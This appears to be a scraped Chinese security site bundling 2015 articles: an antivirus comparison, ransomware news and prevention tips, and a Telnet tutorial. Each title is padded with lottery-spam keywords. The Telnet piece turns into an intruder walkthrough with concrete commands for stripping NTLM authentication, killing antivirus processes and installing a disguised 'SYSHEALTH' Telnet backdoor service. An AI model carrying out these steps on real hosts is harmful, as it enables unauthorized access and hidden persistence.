2016》,就显得比较经济实惠了。</p> [安全产品]金山毒霸和360哪个好-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/29989_1.html 西西 安全产品 2015/12/10 19:13:01 <p>自从微软宣布停止对XP系统的更新支持后,很多xp用户都十分担心自己的系统安全。虽然国内的互联网厂商纷纷表示会继续支持xp系统的安全问题,可是那么多的产品哪个才是最好的呢,这里西西给大家分析下金山毒霸和360这两款国内老牌杀软哪个好。<br/></p><p style="text-align: center;"><img src="https://pic.cr173.com/up/2015-12/14497459712130048.jpg" title="未标é¢?1.jpg"/></p><p><a href="http://www.pjyuanjian.com/soft/30968.html" target="_self">360杀毒最新版</a></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2014-4/201404151614251132901.png"/></p><p>360杀毒软件创新性地整合了五大领先防杀引擎,包括国际知名的 BitDefender 病毒查杀引擎、小红伞病毒查杀引擎、 360云查杀引擎、360主动防御引擎、360QVM人工智能引擎;采用Pro3D全面防御体系、刀片式智能五引擎架构、极致轻巧。</p><p><a href="http://www.pjyuanjian.com/soft/29354.html" target="_self">金山毒霸2014</a></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2014-4/13975499838064589.png" title="222038r4v5erehru8rhvef.png"/></p><p><br/></p><p>金山毒霸2014拥有非常小的安装包(不到10MB)、可以十秒快速完成安装,对于系统的资源占用也非常的少,猎豹采用30核云端引擎以及蓝芯本地引擎,具有非常强悍的病毒侦测能力。</p><p><span style="color: rgb(255, 0, 0);"><strong>无论从体积还是安装体验,金山毒霸当属最佳;</strong></span>360杀毒安装速度也非常快,但需要更新后方便正常使用,耗时依网络而定;瑞星虽然取消了安装重启,安装速度也得到了大幅提升,但相比毒霸还是稍逊一筹。</p><p>从功能布局上来看,他们都提供了最直接有效的使用路径给用户;在界面上,瑞星的UI做的只能说是一般,而360、金山在上面花得功夫要多得多,界面看起来也非常的美观。</p> [防护教程]欧洲防毒公司推出CryptoLocker勒索病毒疫苗-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/68528_1.html 西西 防护教程 2015/12/7 15:19:27 <p>勒索病毒让人闻之色变,虽然先前我们曾报导过「电脑中了勒索病毒无解吗?先试试看卡巴斯基的解密工具」,表示卡巴斯基有针对特定种类的勒索软件来进行解密,但一定要等到出事情才用吗?其实并不是,现在还有一间欧洲的防毒软体公司,针对其中两种勒索病毒「Cryptolocker」和「Cryptowall」,制做了电脑用的「疫苗」,保护你的电脑不被这两套勒索软件入侵。</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210350977529.jpg"/></p><p><br/>↑勒索病毒摧毁许多人电脑内的重要档案。</p><p>罗马尼亚的防毒软体公司Bitdefender,日前针对了「Cryptolocker」和「Cryptowall」两种勒索病毒推出了电脑疫苗,声称这个疫苗可以阻止任何档案「Cryptolocker」和「Cryptowall」加密,也尽可能有效对抗「Cryptolocker」和「Cryptowall」的变种病毒,他们所推出的疫苗<strong>Bitdefender Anti-CryptoWall</strong>,其实说穿了就是透过即时监控来阻止勒索软件的启动。</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210351189915.png"/></p><p><br/>↑点选网页右边红色的Download就可以下载了。</p><p>当然,勒索软件百百种,<strong>Bitdefender Anti-CryptoWall</strong>仅能阻挡其中两种,而且病没有包含这两种的变形病毒,使用者除了使用这个疫苗外,最好还是保持着良好的电脑使用习惯,像是「不要乱逛未知网站和开启档案」、「软件(Windows、Adobe、Java)请更新到最新」、「装可信任的防毒」。</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210351220418.png"/></p><p><br/>↑程序执行的画面。</p> [防护教程]ransomware勒索病毒 卡巴斯基的解密工具-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/70999_1.html 西西 防护教程 2015/10/16 11:21:05 <p>最近勒索病毒横行,就连在台湾也有不少人中奖,这事情大条到就连FBI都说「遭到勒索软件绑架计算机档案时,最好的方法就是花钱消灾。」如此响应让不少网友心灰意冷,不过现在知名防毒软体卡巴斯基释出了一个解密软件,大家在交付赎款(或是咬牙重灌)前,可以先试试看这套软件。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011210381315267.png"/></p><p><br/>↑其实真的没想过会听到FBI这样子响应。来源:http://technews.tw/2015/10/31/fbi-advises-to-pay-up-for-ransomware/</p><p>勒索程序(ransomware)又名流氓软件,他会将你电脑上的照片、文件等档案加密,并且在电脑中留下联系方式,要求受害者交付赎金,才能取得将档案解密的解密密钥。由于实在太过猖獗,荷兰警方的国家高科技犯罪部门在今年4月开始与卡巴斯基携手合作,研究如何对抗其中两种勒索软件「CoinVault」、「Bitcryptor」。甚至也因为荷兰警方在9月逮捕了相关勒索程序的作者,接管病毒的伺服器后,卡巴斯基也因此取得了解密密钥。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011210381529121.jpg"/></p><p><br/>↑现在CoinVault与Bitcryptor的勒索软件有解了。</p><p>卡巴斯基日前将取得的CoinVault与Bitcryptor所有的解密密钥总计超过1.4万个,加入解密程序的数据库中,使用者只要一执行解密程序,它就会自动将所有加密的档案解密,其实卡巴斯基与CoinVault的对抗,是从2014年就开始的,只是当时因为数据库不齐全,现在宣称已搜集CoinVault与Bitcryptor的所有解密密钥,让受害者免费使用。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011210381582270.png"/></p><p><br/>↑卡巴斯基这五年来,一直努力对抗勒索软件。</p><p>此外,卡巴斯基还霸气的批评FBI,认为附钱给勒索软件作者并不是好做法,因为没人能保证付钱后档案就会回来,而且付钱是一种助长罪犯的行为。</p> [防护教程]简单预防档案加密病毒《TorrentLocker》及《Crypt0L0cker》-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/69284_1.html 西西 防护教程 2015/9/16 16:10:15 <p>大家应该多少有耳闻「我的计算机档案被加密了,黑客要求我付XX元比特币,否则我整台电脑的档案都无法使用」这类的案例。原以为这种事情只发生在遥远的国外,但是最近竟然在台湾地区听到类似的事情。于是就着手整理了这篇,希望能在事情发生之前,尽可能地降低大家的中奖的可能性。(这并不是乐透还是发票,就真的别中了)</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210455171226.jpg"/></p><p>↑日本方面也有传出勒索病毒的消息。</p><p>根据《ithome》报导指出,《Crypt0L0cker》是在2013年时引发恐慌的勒索软件,原本在2014年6月被各国警方破获,但是在2014年年底,有资安公司发现《TorrentLocker》的存在,比起《Crypt0L0cker》是单一的英文版本,《TorrentLocker》讲究的是「在地化服务」,有着各国语言版本。《TorrentLocker》是透过电子邮件散布的,标题则会视当地国家在意的话题,比如没缴的电话费、候选人的支持等等,资安公司ESET就说「这是一个相当本土化的攻击手法。」病毒主要锁定攻击欧洲国家,包括:英国,澳大利亚,加拿大,捷克共和国,意大利,爱尔兰,法国,德国,荷兰,新西兰,西班牙和土耳其等,但在日本也曾发现踪迹。</p><p>而台湾在怎么撑,也在今年4月时传出案例,网友ray1988man在巴哈姆特发布了一系列的画面,表示他被《Crypt0L0cker》缠上,「电脑几乎所有的图片档、视频档、压缩档、office文件档、pdf档全都加密」。ray1988man并表示「加密过程,防毒软体根本辨识不出来,而且只有放毒的人才有加密的key,然后跟你勒索费用。病毒很好删,主要是后续问题,被加密的文件不会被解密,想救回来就是付钱,不过也别傻去付钱。」</p><p>受害者特征</p><p>在巴哈姆特与Mobile01的网友通力合作、收集各方信息下,终于有比较明确的应对方式:</p><p>1.该病毒为多语系–至少有英文、西班牙文、德文、日文、中文、韩文、泰文。<br/>2.感染途径确认为Drive-by download attack,会在浏览被改窜的恶意网站、或开启邮件、甚至点选弹跳视窗时强制安装病毒。<br/>3.会被感染电脑的特征都有下列四者其中之一–<br/> a.旧版Java。<br/> b.旧版Adobe Reader。<br/> c.旧版Adobe Flash Player。<br/> d.没有将Windows Update更新到最新。<br/>换言之、如果上述四者都有更新到最新版,那么感染的机会微乎其微。</p><p>因XP已经不再更新/修补系统,所以XP无法从系统这部分抵御病毒入侵。<br/>4.2015/05/01现在目前除了镜像档还原外没有任何有效的解法。</p><p>(来源:Mobile01)</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210455254878.jpg"/></p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210455370877.jpg"/></p><p>↑這不是國外的事情,近幾個月台灣也開始傳出災情了。</p><p>病毒潛伏特徵</p><p>不確定自己是否中毒者,可以檢查一下電腦中有沒有含有「encrypted」的檔案。若有,請盡速備份重要檔案。並進入安全模式下想辦法找出有問題的執行檔刪除。另,有不少案例中傳出,中毒者的電腦中會多出以下的檔案,使用者可以參考一下。</p><p>可能跑出現的檔案</p><p>HELP_TO_SAVE_FILES.txt</p><p>HELP_RESTORE_FILES.txt</p><p>DECRYPT_INSTRUCTIONS</p><p>RECOVERY_FILE.txt</p><p>.encrypted</p><p>*.ezz</p><p>*.ecc</p><p>(來源:巴哈姆特)</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210455322546.png"/></p><p>↑許多中毒者的電腦中,許多資料夾內都跑出這些檔案。來源:巴哈姆特</p><p>對應方式</p><p>1.Windows系統更新:更新名稱有「安全性更新」的項目全裝。</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210455427064.jpg"/></p><p>↑有標記「安全性更新」的更新檔,全部都要安裝。</p><p><strong>2.以下五個軟體更新到最新</strong></p><p>Jave:驗證JAVE版本</p><p>Adobe Reader:Adobe Reader最新版下載處</p><p>Adobe Flash Player:Flash Player更新網址</p><p>Silverlight:Silverlight下載處</p><p>Chrome:最新版下載處</p><p>3.Win XP使用者,因為系統已經停止支援更新。請盡速更換成Win7或是更高版本作業系統。</p><p>基本上,「電腦裝上有效的防毒軟體」與「正確的上網習慣」是避免中毒的不二法門,如果你真的不小心電腦被加密檔案了,請認知一個觀念「不要付錢!」一方面是你付錢,等於你贊同這樣的行為,讓駭客繼續躺著賺。二方面是,目前有許多案例傳出,駭客所使用的演算法有問題,你付錢拿到的檔案不見得能夠解除加密,但是到這時候也是沒有用的了。</p><p>↑这不是国外的事情,近几个月台湾也开始传出灾情了。</p><p><strong>病毒潜伏特征</strong></p><p>不确定自己是否中毒者,可以检查一下电脑中有没有含有「encrypted」的档案。若有,请尽速备份重要档案。并进入安全模式下想办法找出有问题的执行档删除。另,有不少案例中传出,中毒者的电脑中会多出以下的档案,使用者可以参考一下。</p><p>可能跑出现的档案</p><p>HELP_TO_SAVE_FILES.txt</p><p>HELP_RESTORE_FILES.txt</p><p>DECRYPT_INSTRUCTIONS</p><p>RECOVERY_FILE.txt</p><p>.encrypted</p><p>*.ezz</p><p>*.ecc</p><p>(来源:巴哈姆特)</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210455322546.png"/></p><p>↑许多中毒者的电脑中,许多文件夹内都跑出这些档案。来源:巴哈姆特</p><p>对应方式</p><p>1.Windows系统更新:更新名称有「安全性更新」的项目全装。</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210455427064.jpg"/></p><p>↑有标记「安全性更新」的更新档,全部都要安装。</p><p>2.以下五个软件更新到最新</p><p>Jave:验证JAVE版本</p><p>Adobe Reader:Adobe Reader最新版下载处</p><p>Adobe Flash Player:Flash Player更新网址</p><p>Silverlight:Silverlight下载处</p><p>Chrome:最新版下载处</p><p>3.Win XP使用者,因为系统已经停止支持更新。请尽速更换成Win7或是更高版本操作系统。</p><p>基本上,「电脑装上有效的防毒软体」与「正确的上网习惯」是避免中毒的不二法门,如果你真的不小心电脑被加密档案了,请认知一个观念「不要付钱!」一方面是你付钱,等于你赞同这样的行为,让黑客继续躺着赚。二方面是,目前有许多案例传出,黑客所使用的算法有问题,你付钱拿到的档案不见得能够解除加密,但是到这时候也是没有用的了。</p> [网络安全]windows2008安装telnet程序-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/58770_1.html 西西小熊 网络安全 2015/5/17 22:45:13 <p>Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。要开始一个telnet会话,必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。</p><p><br/></p><p>默认在 XP下面telnet组件是自动安装的,但在 win7 以后的版本都需要自动手动安装才可以用。西西这个文章就教大家如何在 2008下面安装 telnet</p><p><br/></p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微软雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);"><strong style="line-height: 22.75px;">“telnet”不是内部或外部命令,也不是可运行的程序或批处理文件。</strong></p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微软雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);">这是因为telnet在sever2008下默认是没有安装的,需要安装后使用。</p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微软雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);">在“服务器管理器”管理界面中左侧打开“功能”一项:</p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微软雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);"><a class="cboxElement" rel="nofollow" href="http://pic.cr173.com/up/2015-5/2015051722474228709.png" style="color: rgb(1, 150, 227); line-height: 22.75px;"><img alt="" width="701" height="458" original="http://pic.cr173.com/up/2015-5/2015051722474228709.png" src="https://pic.cr173.com/up/2015-5/2015051722474228709.png" style="border: 0px; max-width: 100%; height: auto; margin: 0px 0px 10px; padding: 0px; display: inline; background-color: transparent;"/></a></p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微软雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);">点击右侧的“添加功能”</p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微软雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);"><a class="cboxElement" rel="nofollow" href="http://pic.cr173.com/up/2015-5/2015051722474275045.png" style="color: rgb(1, 150, 227); line-height: 22.75px;"><img alt="" width="696" height="513" original="http://pic.cr173.com/up/2015-5/2015051722474275045.png" src="https://pic.cr173.com/up/2015-5/2015051722474275045.png" style="border: 0px; max-width: 100%; height: auto; margin: 0px 0px 10px; padding: 0px; display: inline; background-color: transparent;"/></a></p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微软雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);">选中“Telnet客户端“点击 下一步</p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微软雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);"><a class="cboxElement" rel="nofollow" href="http://pic.cr173.com/up/2015-5/2015051722473772408.png" style="color: rgb(1, 150, 227); line-height: 22.75px;"><img alt="" width="698" height="511" original="http://pic.cr173.com/up/2015-5/2015051722473772408.png" src="https://pic.cr173.com/up/2015-5/2015051722473772408.png" style="border: 0px; max-width: 100%; height: auto; margin: 0px 0px 10px; padding: 0px; display: inline; background-color: transparent;"/></a></p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微软雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);">确认安装界面,点击”安装“</p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微软雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);"><a class="cboxElement" rel="nofollow" href="http://pic.cr173.com/up/2015-5/2015051722473846361.png" style="color: rgb(105, 105, 105); line-height: 22.75px; cursor: pointer;"><img alt="" width="695" height="511" original="http://pic.cr173.com/up/2015-5/2015051722473846361.png" src="https://pic.cr173.com/up/2015-5/2015051722473846361.png" style="border: 0px; max-width: 100%; height: auto; margin: 0px 0px 10px; padding: 0px; display: inline; background-color: transparent;"/></a></p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微软雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);">telnet 安装成功。</p><p><br/></p><p>windows 7 下面安装telnet功能&nbsp;<a href="http://www.pjyuanjian.com/html/18697_1.html" _src="http://www.pjyuanjian.com/html/18697_1.html">http://www.pjyuanjian.com/html/18697_1.html</a>&nbsp;</p><p><br/></p><p>telnet 在服务器中最常用的就是用来测试某一台服务器的端口是否打开</p><p>telnet IP 端口</p><p><strong>如: telnet </strong><a href="http://www.pjyuanjian.com" _src="http://www.pjyuanjian.com"><strong>www.pjyuanjian.com</strong></a><strong>&nbsp;80</strong></p><p><br/></p><p><strong>TELNET常用参数:</strong></p><p>命令可能是缩写。支持的命令为:</p><p><br/></p><p>c &nbsp; &nbsp;- close &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;关闭当前连接</p><p>d &nbsp; &nbsp;- display &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;显示操作参数</p><p>o &nbsp; &nbsp;- open hostname [port] &nbsp; &nbsp; 连接到主机(默认端口 23)。</p><p>q &nbsp; &nbsp;- quit &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 退出 telnet</p><p>set &nbsp;- set &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;设置选项(键入 &#39;set ?&#39; 获得列</p><p>sen &nbsp;- send &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 将字符串发送到服务器</p><p>st &nbsp; - status &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 打印状态信息</p><p>u &nbsp; &nbsp;- unset &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;解除设置选项(键入 &#39;set ?&#39; 获</p><p>?/h &nbsp;- help &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 打印帮助信息</p><p><br/></p><p><br/></p><p><br/></p><h3><strong>1、什么是Telnet?</strong></h3><p>  对于Telnet的认识,不同的人持有不同的观点,可以把Telnet当成一种通信协议,但是对于入侵者而言,Telnet只是一种远程登录的工具。一旦入侵者与远程主机建立了Telnet连接,入侵者便可以使用目标主机上的软、硬件资源,而入侵者的本地机只相当于一个只有键盘和显示器的终端而已。</p><p><strong>2、Telnet被入侵者用来做什么</strong></p><p>  (1)Telnet是控制主机的第一手段</p><p>  如果入侵者想要在远程主机上执行命令,需要建立IPC$连接,然后使用net time命令查看系统时间,最后使用at命令建立计划任务才能完成远程执行命令。虽然这种方法能够远程执行命令,但相比之下,Telnet方式对入侵者而言则会方便得多。入侵者一旦与远程主机建立Telnet连接,就可以像控制本地计算机一样来控制远程计算机。可见,Telnet方式是入侵者惯于使用的远程控制方式,当他们千方百计得到远程主机的管理员权限后,一般都会使用Telnet方式进行登录。</p><p>  (2)用来做跳板</p><p>入侵者把用来隐身的肉鸡称之为“跳板”,他们经常用这种方法,从一个“肉鸡”登录到另一个“肉鸡”,这样在入侵过程中就不会暴露自己的IP地址。</p><p><strong>3.关于NTLM验证</strong></p><p>由于Telnet功能太强大,而且也是入侵者使用最频繁的登录手段之一,因此微软公司为Telnet添加了身份验证,称为NTLM验证,它要求Telnet终端除了需要有Telnet服务主机的用户名和密码外,还需要满足NTLM验证关系。NTLM验证大大增强了Telnet主机的安全性,就像一只拦路虎把很多入侵者拒之门外。</p><p><strong>4、Telnet语法</strong></p><p>telnet [-a][-e escape char][-f log file][-l user][-t term][host [port]]</p><p>-a 企图自动登录。除了用当前已登陆的用户名以外,与 -l 选项相同。</p><p>-e 跳过字符来进入 telnet 客户提示。</p><p>-f 客户端登录的文件名</p><p>-l 指定远程系统上登录用的用户名称。</p><p>要求远程系统支持 TELNET ENVIRON 选项。</p><p>-t 指定终端类型。</p><p>支持的终端类型仅是: vt100, vt52, ansi 和 vtnt。</p><p>host 指定要连接的远程计算机的主机名或 IP 地址。</p><p>port 指定端口号或服务名。</p><p>5.使用Telnet登录</p><p>登录命令:telnet HOST [PORT] 例如:telnet 61.152.158.132 23(默认端口)</p><p>断开Telnet连接的命令:exit</p><p>  成功地建立Telnet连接,除了要求掌握远程计算机上的账号和密码外,还需要远程计算机已经开启“Telnet服务”,并去除NTLM验证。也可以使用专门的Telnet工具来进行连接,比如STERM,CTERM等工具。</p><p>6.Telnet典型入侵(如果以下内容不太了解,可以简单了解)</p><p>  1.Telnet典型入侵步骤</p><p>  步骤一:建立IPC$连接。其中sysback是前面建立的后门账号。</p><p>  步骤二:开启远程主机中被禁用的Telnet服务。</p><p>  步骤三:断开IPC$连接。</p><p>  步骤四:去掉NTLM验证。如果没有去除远程计算机上的NTLM验证,在登录远程计算机的时候就会失败。</p><p>  不过入侵者会使用各种方法使NTLM验证形同虚设。解除NTLM的方法有很多,下面列出一些常用的方法,来看看入侵者如何去除NTLM验证。</p><p>  (1)方法一&nbsp;</p><p>  首先,在本地计算机上建立一个与远程主机上相同的账号和密码。</p><p>  然后,通过“开始”→“程序”→“附件”找到“命令提示符”,使用鼠标右键单击“命令提示符”,然后选择“属性”</p><p>  在“以其他用户身份运行(U)”前面“打钩”,然后单击“确定”按钮。接着,仍然按照上述路径找到“命令提示符”,用鼠标左键单击打开,得到如图所示对话框。</p><p>  如图所示,键入“用户名”和“密码”。</p><p>  单击“确定”按钮后,得到MS-DOS界面,然后用该MS-DOS进行Telnet登录。</p><p>  键入“telnet 192.168.27.128”命令并回车后,在得到的界面中键入“y”表示发送密码并登录,如图所示。</p><p>  最后得到就是远程主机为Telnet终端用户打开的Shell,在该Shell中输入的命令将会直接在远程计算机上执行。</p><p>  比如,键入“net user”命令来查看远程主机上的用户列表。</p><p>  (2)方法二&nbsp;</p><p>  该方法使用工具NTLM.EXE来去除NTLM验证。首先与远程主机建立IPC$连接,然后将NTLM.EXE拷贝至远程主机,最后通过at命令使远程计算机执行NTLM.EXE。</p><p>  计划任务执行NTLM.EXE后,便可键入“telnet 192.168.27.128”命令来登录远程计算机。</p><p>  最后得到登录界面</p><p>  在该登录界面中键入用户名和密码,如果用户名和密码正确,便会登录到远程计算 机,得到远程计算机的Shell。</p><p>  成功登录。</p><p>  另外,还可以使用与opentelnet.exe相配套的程序resumetelnet.exe来恢复远程主机的NTLM验证,命令格式为“ResumeTelnet.exe \\server sername password”。</p><p>  执行后回显可知,resumetelnet.exe关闭了目标主机的Telnet服务,恢复了NTLM验证。</p><p>  Telnet高级入侵全攻略&nbsp;</p><p>  从前面的介绍可以看出,即使计算机使用了NTLM验证,入侵者还是能够轻松地去除NTLM验证来实现Telnet登录。如果入侵者使用23号端口登录,管理员便可以轻易地发现他们,但不幸的是,入侵者通常不会通过默认的23号端口进行Telnet连接。那么入侵者究竟如何修改Telnet端口,又如何修改Telnet服务来隐蔽行踪呢?下面举一些常见的例子来说明这一过程,并介绍一下完成这一过程所需要的工具。</p><p>  X-Scan:用来扫出存在NT弱口令的主机。</p><p>  opentelnet:用来去NTLM验证、开启Telnet服务、修改Telnet服务端口。</p><p>  AProMan:用来查看进程、杀死进程。</p><p>  instsrv:用来给主机安装服务。</p><p>  (1)AProMan简介</p><p>  AproMan以命令行方式查看进程、杀死进程,不会被杀毒软件查杀。举个例子,如果入侵者发现目标主机上运行有杀毒软件,会导致上传的工具被杀毒软件查杀,那么他们就会要在上传工具前关闭杀毒防火墙。使用方法如下:</p><p>  c:\AProMan.exe -a 显示所有进程</p><p>  c:\AProMan.exe -p 显示端口进程关联关系(需Administrator权限)</p><p>  c:\AProMan.exe -t [PID] 杀掉指定进程号的进程</p><p>  c:\AProMan.exe -f [FileName] 把进程及模块信息存入文件</p><p>  (2)instsrv简介</p><p>  instsrv是一款用命令行就可以安装、卸载服务的程序,可以自由指定服务名称和服务所执行的程序。instsrv的用法如下:</p><p>  安装服务:instsrv &lt;服务名称&gt; &lt;执行程序的位置&gt;</p><p>  卸载服务:instsrv &lt;服务名称&gt; REMOVE</p><p>  还有另一款优秀的远程服务管理工具SC。它属于命令行工具,可以在本地对远程计算机上的服务进行查询、启动、停止和删除。它的用法很简单,这里不作介绍了。下面通过实例来介绍入侵者如何实现Telnet登录并留下Telnet后门的过程。</p><p>  步骤一:扫出有NT弱口令的主机。在X-Scan的“扫描模块”中选中“NT-SERVER弱口令”。</p><p>  然后在“扫描参数中”指定扫描范围为“192.168.27.2到192.168.27.253”。</p><p>  等待一段时间后,得到扫描结果。</p><p>  步骤二:用opentelnet打开远程主机Telnet服务、修改目标主机端口、去除NTLM验证。&nbsp;</p><p><br/></p><p>  无论远程主机是否开启“Telnet服务”,入侵者都可以通过工具opentelnet来解决。比如,通过“opentelnet \\192.168.27.129 administrator &quot;&quot; 1 66”命令为IP地址为192.168. 27.129的主机去除NTLM认证,开启Telnet服务,同时又把Telnet默认的23号登录端口改成66号端口。</p><p>  步骤三:把所需文件(instsrv.exe、AProMan.exe)拷贝到远程主机。</p><p>  首先建立IPC$,然后通过映射网络硬盘的方法把所需文件拷贝、粘贴到远程计算机的c:\winnt文件夹中。</p><p>  拷贝成功后。</p><p>  步骤四:Telnet登录。</p><p>  在MS-DOS中键入命令“telnet 192.168.27.129 66”来登录远程主机192.168.27.129。</p><p>  步骤五:杀死防火墙进程。</p><p>  如果入侵者需要把类似木马的程序拷贝到远程主机并执行,那么他们会事先关闭远程主机中的杀毒防火墙。虽然这里没有拷贝类似木马的程序到远程主机,但还是要介绍一下这一过程。当入侵者登录成功后,他们会进入到c:\winnt目录中使用AProMan程序。首先通过命令 AProMan –A查看所有进程,然后找到杀毒防火墙进程的PID,最后使用AProMan –t [PID]来杀掉杀毒防火墙。</p><p>  步骤六:另外安装更为隐蔽的Telnet服务。</p><p>  为了事后仍然能登录到该计算机,入侵者在第一次登录之后都会留下后门。这里来介绍一下入侵者如何通过安装系统服务的方法来让Telnet服务永远运行。在安装服务之前,有必要了解一下Windows操作系统是如何提供“Telnet服务”的。打开“计算机管理”,然后查看“Telnet服务”属性。</p><p>  在“Telnet 的属性”窗口中,可以看到其中“可执行文件的路径”指向“C:\WINNT\ SYSTEM32\tlntsvr.exe”。可见,程序tlntsvr.exe就是Windows系统中专门用来提供“Telnet服务”的。也就是说,如果某服务指向该程序,那么该服务就会提供Telnet服务。因此,入侵者可以自定义一个新服务,将该服务指向tlntsvr.exe,从而通过该服务提供的Telnet服务登录,这样做后,即使远程主机上的Telnet服务是被禁用的,入侵者也可以毫无阻碍的登录到远程计算机,这种方法被称之为 Telnet后门。下面就介绍一下上述过程是如何实现的。首先进入instsrv所在目录。</p><p>  然后使用instsrv.exe建立一个名为“SYSHEALTH”的服务,并把这个服务指向C:\WINNT z\SYSTEM32\tlntsvr.exe,根据instsrv.exe的用法,键入命令“instsrv.exe SYSHEALTH C:\WINNT\SYSTEM32\tlntsvr.exe”。</p><p>  一个名为“SYSHEAHTH”的服务就这样建立成功了。虽然从表面看上去该服务与远程连接不存在任何关系,但是实际上该服务是入侵者留下的Telnet后门服务。</p><p>  通过“计算机管理”可以看到该服务已经添加在远程计算机上。入侵者一般会把这个服务的启动类型设置成“自动”,把原来的“Telnet服务”停止并禁用。</p><p>  通过验证可知,虽然远程主机上的Telnet服务已经被停止并禁用,但入侵者仍然能够 &nbsp; &nbsp; &nbsp;通过Telnet来控制远程主机。通过这些修改,即使管理员使用“netstat –n”命令来查看开放端口号也看不出66端口正在提供Telnet服务,此命令平常还可以拿来判断端口的连接情况。</p><p><br/></p><p><br/></p> 